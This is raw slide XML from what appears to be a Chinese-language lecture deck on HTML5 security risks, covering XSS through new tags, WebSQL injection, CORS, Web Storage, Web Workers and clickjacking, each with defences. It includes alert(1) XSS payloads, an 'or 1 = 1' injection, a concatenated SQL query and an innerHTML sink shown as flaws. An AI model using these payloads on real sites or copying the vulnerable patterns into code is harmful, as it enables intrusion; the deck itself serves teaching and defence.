            <a:ext cx="1087394" cy="889686"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47816"/>
              <a:gd name="adj2" fmla="val 109867"/>
              <a:gd name="adj3" fmla="val 31339"/>
              <a:gd name="adj4" fmla="val 3267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 Socket</a:t>
            </a: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2796710" y="1119269"/>
            <a:ext cx="1087394" cy="538725"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 124779"/>
              <a:gd name="adj2" fmla="val 51580"/>
              <a:gd name="adj3" fmla="val 214422"/>
              <a:gd name="adj4" fmla="val 434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攻击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安全风险详析：新标签攻击</a:t>
            </a:r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13620"/>
            <a:ext cx="34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完善过滤的脚本或黑名单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730326"/>
            <a:ext cx="8053754" cy="1072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Tags: Audio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Footer…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    Attributes: poster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autofocus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formaction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oninput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266092"/>
            <a:ext cx="293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dirty="0" smtClean="0"/>
              <a:t> 新的标签和属性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080825"/>
            <a:ext cx="293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dirty="0" smtClean="0"/>
              <a:t> 攻击方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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3530986"/>
            <a:ext cx="8053754" cy="1491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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多媒体标签：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;video&gt;&lt;source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(1)“&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>                         &lt;video poster=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(1)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自动聚焦：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;input autofocus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>onfocus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=“alert(1)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表单和按钮：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;form&gt;&lt;button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>formaction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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(1)"&gt;test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510" y="1931080"/>
            <a:ext cx="8359972" cy="309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251955"/>
            <a:ext cx="293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dirty="0" smtClean="0"/>
              <a:t> 防御之道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err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r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WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的安全风险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攻击方式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smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>注入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数据库探测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防御之道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检查输入类型，过滤危险字符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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>语句中使用参数形式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谨慎对待每一次</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>操作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不要存储重要数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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3046" y="2942470"/>
            <a:ext cx="8053754" cy="1087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executeSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("SELECT name FROM stud WHERE id=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input_id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=&gt;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executeSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("SELECT name FROM stud WHERE id=?“,[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>])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227" y="2572512"/>
            <a:ext cx="86963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79523" y="3004462"/>
            <a:ext cx="4242881" cy="1584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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、获取数据库对象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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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</a:rPr>
              <a:t>上的表结构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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、获取数据表名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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、操作数据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79523" y="1982725"/>
            <a:ext cx="6107277" cy="1970786"/>
            <a:chOff x="2579523" y="1982725"/>
            <a:chExt cx="6107277" cy="19707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9523" y="3097451"/>
              <a:ext cx="3852274" cy="856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Callout 1 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5090090" y="1982725"/>
              <a:ext cx="3596710" cy="589787"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 18750"/>
                <a:gd name="adj2" fmla="val -8333"/>
                <a:gd name="adj3" fmla="val 175574"/>
                <a:gd name="adj4" fmla="val -3769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select name from user where id = [1]</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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70885" y="2135125"/>
            <a:ext cx="6715915" cy="2315456"/>
            <a:chOff x="1970885" y="2135125"/>
            <a:chExt cx="6715915" cy="231545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70885" y="3197963"/>
              <a:ext cx="5265068" cy="1252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Callout 1 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4290956" y="2135125"/>
              <a:ext cx="4395844" cy="589787"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 27870"/>
                <a:gd name="adj2" fmla="val -4356"/>
                <a:gd name="adj3" fmla="val 156890"/>
                <a:gd name="adj4" fmla="val -2449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select name from user where id = [1 or 1 = 1]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smtClean="0"/>
              <a:t>CORS</a:t>
            </a:r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SOP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CORS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>带来的风险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smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>头不可信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第三方可能会被入侵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恶意跨域请求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内部信息泄漏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针对用户的攻击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攻击工具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防御之道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不信任未经身份验证的跨域请求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请求方验证接收的数据有效性，服务方仅暴露最少最必需的功能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通过多种条件屏蔽非法请求，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>头、参数等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US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773" y="2402902"/>
            <a:ext cx="4345079" cy="19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8017" y="3157538"/>
            <a:ext cx="2131125" cy="65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1743" y="3128963"/>
            <a:ext cx="2403610" cy="68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08017" y="3128963"/>
            <a:ext cx="5322174" cy="1087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Access –Control-Allow-Origin: http://blog.csdn.net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5766" y="1735494"/>
            <a:ext cx="2388637" cy="1530220"/>
            <a:chOff x="1635766" y="1735494"/>
            <a:chExt cx="2388637" cy="1530220"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1635766" y="1735494"/>
              <a:ext cx="2388637" cy="1530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u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://a.com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94128" y="2463282"/>
              <a:ext cx="1866123" cy="559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one.php</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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61143" y="4225159"/>
            <a:ext cx="2388637" cy="1530220"/>
            <a:chOff x="3161143" y="4225159"/>
            <a:chExt cx="2388637" cy="1530220"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3161143" y="4225159"/>
              <a:ext cx="2388637" cy="1530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web browser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19505" y="4408877"/>
              <a:ext cx="1866123" cy="559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a.html</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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9881" y="1735494"/>
            <a:ext cx="2388637" cy="1530220"/>
            <a:chOff x="4479881" y="1735494"/>
            <a:chExt cx="2388637" cy="1530220"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4479881" y="1735494"/>
              <a:ext cx="2388637" cy="15302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u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://b.com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38243" y="2463282"/>
              <a:ext cx="1866123" cy="559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two.php</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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948161" y="3265714"/>
            <a:ext cx="950114" cy="959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9277" y="3578769"/>
            <a:ext cx="212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Same Origin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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649784" y="3265714"/>
            <a:ext cx="899996" cy="9699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75266" y="3578769"/>
            <a:ext cx="212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Cross Domain</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Multiply 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4659413" y="3421109"/>
            <a:ext cx="811537" cy="64639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051931" y="3126383"/>
            <a:ext cx="5322174" cy="1087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http://www.search.com/?t=%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9" grpId="0"/>
      <p:bldP spid="19" grpId="1"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="21" grpId="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="1" animBg="1"/>
      <p:bldP spid="22" grpId="2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smtClean="0"/>
              <a:t>Web Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Web Storage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攻击方式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遍历本地存储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全局变量的问题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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击工具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smtClean="0"/>
              <a:t>HTML5CSdump</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：自动攻击工具</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防御之道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数据放在合适的作用域里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不要存储敏感数据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pPr>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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3666" y="2729202"/>
            <a:ext cx="5087629" cy="191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71054" y="1848173"/>
            <a:ext cx="8053754" cy="3886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window)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=window[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  if(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!=null||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!=undefined)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type =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if(type=="object"||type=="string") {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>        console.log(“Name:”+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try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>            my = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>JSON.stringify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console.log(my);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>        } catch(ex) {}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smtClean="0"/>
              <a:t>Web Worker</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击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Web Worker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攻击方式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僵尸网络：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>DDos</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>攻击、发送垃圾邮件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en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Ravan</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr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防御之道</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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不访问不安全站点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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>时验证来源</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>时不要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" alt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650838" y="3288890"/>
            <a:ext cx="6144810" cy="95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worker.addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(‘message’, function(e)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CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(‘result’).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.data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}, false);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2948" y="1355440"/>
            <a:ext cx="63627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eb-workers-explain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236" y="1355440"/>
            <a:ext cx="6335748" cy="49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安全风险详析：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ClickJacking</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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ClickJacking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测试工具</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="clickjack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86" y="1398494"/>
            <a:ext cx="4857750" cy="44005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684" y="1608044"/>
            <a:ext cx="67341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37565" y="1608044"/>
            <a:ext cx="5629271" cy="393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8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1059</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>214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封面</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>自定义设计</vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>从HTML到HTML5</vt:lpstr>
      <vt:lpstr>HTML5安全风险综述</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：新标签攻击</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：WebSQL攻击</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：CORS攻击</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：Web Storage攻击</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：Web Worker攻击 </vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：ClickJacking</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：CookieJacking</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：CORJacking</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：WebSocket攻击</vt:lpstr>
      <vt:lpstr>HTML5安全风险详析：API攻击</vt:lpstr>
      <vt:lpstr>HTML5对安全的改进</vt:lpstr>
      <vt:lpstr>HTML5安全带来的机会</vt:lpstr>
      <vt:lpstr>HTML5安全的未来</vt:lpstr>
      <vt:lpstr>Slide 17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ivy yang</dc:creator>
  <cp:lastModifiedBy>jiangyujie</cp:lastModifiedBy>
  <cp:revision>149</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-07-20T06:33:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-09-09T02:09:13Z</dcterms:modified>
</cp:coreProperties>
</file>